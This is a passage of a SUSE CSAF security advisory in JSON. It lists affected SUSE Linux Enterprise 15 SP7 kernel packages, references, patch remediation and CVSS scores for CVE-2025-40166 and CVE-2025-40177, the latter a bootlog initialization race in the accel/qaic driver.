"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40166",
"url": "https://www.suse.com/security/cve/CVE-2025-40166"
},
{
"category": "external",
"summary": "SUSE Bug 1253433 for CVE-2025-40166",
"url": "https://bugzilla.suse.com/1253433"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40166"
},
{
"cve": "CVE-2025-40177",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40177"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/qaic: Fix bootlog initialization ordering\n\nAs soon as we queue MHI buffers to receive the bootlog from the device,\nwe could be receiving data. Therefore all the resources needed to\nprocess that data need to be setup prior to queuing the buffers.\n\nWe currently initialize some of the resources after queuing the buffers\nwhich creates a race between the probe() and any data that comes back\nfrom the device. If the uninitialized resources are accessed, we could\nsee page faults.\n\nFix the init ordering to close the race.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40177",
"url": "https://www.suse.com/security/cve/CVE-2025-40177"
},
{
"category": "external",
"summary": "SUSE Bug 1253443 for CVE-2025-40177",
"url": "https://bugzilla.suse.com/1253443"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
